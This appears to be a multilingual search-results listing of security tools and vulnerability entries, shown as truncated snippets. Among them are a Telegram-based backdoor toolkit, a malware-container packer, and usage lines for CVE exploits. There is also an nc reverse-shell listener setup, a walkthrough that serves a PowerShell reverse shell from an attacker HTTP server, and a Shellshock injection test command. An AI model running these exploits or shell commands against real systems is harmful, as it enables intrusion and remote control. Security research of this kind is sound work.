856705 matches found
CGA-FV8F-M5XJ-R582
Bulletin has no description...
CGA-33J6-PQ22-H7X5
Bulletin has no description...
meg
meg meg 是一个用于批量获取URL的工具,同时保持对服务器的“友好”。 它可以用来为多个主机获取多个路径;在移动到下一个路径并重复之前,为所有主机获取一个路径。 您可以快速获得大量结果,但不会对单个主机造成流量泛滥。 安装 meg 是用 Go 编写的,没有运行时依赖项。如果您已安装并配置了 Go 1.9 或更高版本,可以使用 go install 安装 meg: root@kitploit: ▶ go install github.com/tomnomnom/meg@latest 或者下载二进制文件并将其放在您的 $PATH 中(例如在 /usr/bin/ 下)。 安装错误...
PackMyPayload
PackMyPayload - Emerging Threat of Containerized Malware Jump to supported formats This tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with...
CVE-2014-6271
CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x=' :;; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line. You may be prompted to enter your password. bash curl -s...
CVE-2023-35813
CVE-2023-35813 针对CVE-2023-35813的漏洞利用程序 使用示例: go run CVE-2023-35813.go https://example.com 或 go build CVE-2023-35813.go ./CVE-2023-35813 https://example.com 截图:...
bt2
bt2: Blaze Telegram 后门工具包 bt2 是一个基于 Python 的后门程序,以 IM 机器人形式存在,利用 Telegram 提供的基础设施和功能丰富的机器人 API,稍加改造其通信平台以充当 C&C 服务器。 依赖项 Telepot requests 安装 root@kitploit: $ sudo pip install telepot $ sudo pip install requests PS: Telepot 需要至少 requests 2.9.1 才能正常工作。 局限性 目前 shellcode 执行组件依赖于 ctypes,仅适用于 Windows 平...
mallory
mallory 基于SSH的HTTP/HTTPS代理。 安装 本机:go install github.com/justmao945/mallory/cmd/mallory@latest 远程服务器:需要我们的老朋友 sshd 配置 配置文件 默认路径为 $HOME/.config/mallory.json,可在启动程序时设置 root@kitploit: mallory -config path/to/config.json 内容: idrsa 是我们的私钥文件路径,可通过 ssh-keygen 生成 localsmart 是提供HTTP代理的本地地址,支持对目标主机进行智能检测...
CVE-2023-42793
CVE-2023-42793 - Create username administrator Example of command execution: root@kitploit: python3 exploit.py -u http://localhost User add token - eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1 Successful execution, preparing for the RC...
Unomi-CVE-2020-13942
CVE-2020-13942 Apache Unomi Remote Code Execution Vulnerability Script Vulnerability Overview Apache Unomi is an open-source Java data platform, a Java server designed to manage data of customers, prospects, and visitors, and to help personalize customer experiences. Unomi can be used to integrat...
CVE-2021-37580
Apache ShenYu Admin has an authentication bypass vulnerability that allows attackers to bypass JSON Web Token JWT security authentication and directly access the system backend. Apache ShenYu is an extensible, high-performance, and reactive API gateway solution used in all microservice scenarios...
xll_windows_reverse_shell
xllwindowsreverseshell xll shell inversa de Windows En tu máquina atacante Kali: root@kitploit: git clone https://github.com/n3rdh4x0r/xllwindowsreverseshell.git 1. Actualiza el revsh.ps1 2. crea un servidor HTTP de Python root@kitploit: python3 -m http.server 9999 En tu máquina atacante Windows:...
nray
nray 概述 Nray 是一款免费、平台与架构无关的端口及应用层扫描器。 nray 以分布式方式运行,以加速扫描并从不同视角执行扫描。 基于事件的结果允许在扫描过程中进一步处理信息,例如使用 jq 等工具。 如果您正在寻找用户文档,请查看项目主页。 有关开发和贡献 nray 的信息,请继续阅读。 构建 在 git 检出后,您可以通过调用 go build 来构建项目。 Nray 使用纯 Go 编写,并注意仅选择同样满足此要求的依赖项,因此标准的 Go 安装(加上 git)就足以在任何支持的平台上构建 nray——这意味着也没有 对 libpcap 等库的依赖。 使用 makefile...
CVE-2025-24813-PoC-exploit
CVE-2025-24813-PoC-exploit Apache Tomcat 反序列化远程代码执行 root@kitploit: ❯ python3 exploit.py http://localhost:8080/ "id" ============================================================ CVE-2025-24813 - Apache Tomcat Partial PUT RCE ============================================================ Target:...
rakkess
rakkess Review Access - kubectl plugin to show an access matrix for server resources Intro Have you ever wondered what access rights you have on a provided kubernetes cluster? For single resources you can use kubectl auth can-i list deployments, but maybe you are looking for a complete overview?...
rakkess
rakkess 审查访问权限 - 一个 kubectl 插件,用于显示服务器资源的访问矩阵 简介 你是否曾想过自己在提供的 Kubernetes 集群上拥有哪些访问权限? 对于单个资源,你可以使用 kubectl auth can-i list deployments,但也许你正在寻找一个完整的概览? 这就是 rakkess 的用途。 它会列出当前用户对所有服务器资源的访问权限,类似于 kubectl auth can-i --list。 它还可用于查找哪些主体可以访问某个服务器资源。 请查看子命令 rakkess resource,详见 下文。 演示 示例 显示所有资源的访问权限...
unrealircd3.2.8.1-local-exploit
Tested on Metasploitable 3 USAGE Ruby On Attacker's shell root@kitploit: nc -nlvp 1111 On victim's shell root@kitploit: ruby exploit.rb 127.0.0.1 Expected output on attacker's shell root@kitploit: listening on any 1111 ... connect to 192.168.56.102 from UNKNOWN 192.168.56.105 48144 bobafett Pytho...
CVE-2022-23779
CVE-2022-23779 CVE-2022-23779 is a security vulnerability in Zoho ManageEngine Desktop Central It is classified as an information disclosure issue CWE-200 where the software leaks internal server information to unauthorized users. Versions before 10.1.2137.8 are affected ::Medium severity...
EUVD-2026-81462
FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain an OS command injection vulnerability in the xtremed daemon. An unauthenticated remote attacker with access to the affected management interface can submit crafted input to the AuthFormServlet...
CVE-2026-90822
CVE-2026-90822 affects FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware 10.1.2r60p100 . An OS command injection in the xtremed daemon allows an unauthenticated remote attacker to submit crafted input to the AuthFormServlet endpoint on the management interface, causing au...